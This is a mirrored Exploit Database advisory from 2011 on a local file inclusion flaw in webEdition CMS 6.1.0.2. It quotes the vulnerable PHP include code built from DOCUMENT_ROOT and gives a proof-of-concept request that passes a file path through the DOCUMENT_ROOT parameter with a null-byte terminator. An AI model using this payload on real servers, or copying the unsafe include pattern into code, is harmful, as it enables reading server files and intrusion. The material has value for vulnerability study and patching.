webEdition CMS – Local File Inclusion

• Exploit Database
• 97 阅读

• 作者： eidelweiss
  日期： 2011-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17057/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79

  =================================================================== webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability =================================================================== Software: webEdition CMS (6.1.0.2) Vendor: http://www.webedition.org Vuln Type:Local File Inclusion Download link:http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download Author: eidelweiss contact:eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info   Gratz: wellcome back YOGYACARDERLINK.web.id !!! References: http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html =================================================================== description: webEdition Version 6.1.0.2   webEdition is a web content management system licensed under the GPL For system requirements, installation and upgrade details, see the files INSTALL and the informations available on our website   http://www.webedition.org   see webEdition/license folder for license informations see INSTALL for quick installation instructions. ---------------------------------- Vulnerability code: index.php   /***************************************************************************** * INITIALIZATION *****************************************************************************/   include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php"); require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");   /***************************************************************************** * INCLUDES *****************************************************************************/   include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php"); include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");   $ignore_browser = isset($_REQUEST["ignore_browser"]) &&($_REQUEST["ignore_browser"] === "true");   /*****************************************************************************   ---------------------------------- exploit & p0c [!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 or [!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet. ==================================================================== Nothing Impossible In This World Even Nobody`s Perfect =================================================================== ==========================| -=[ E0F ]=- |==========================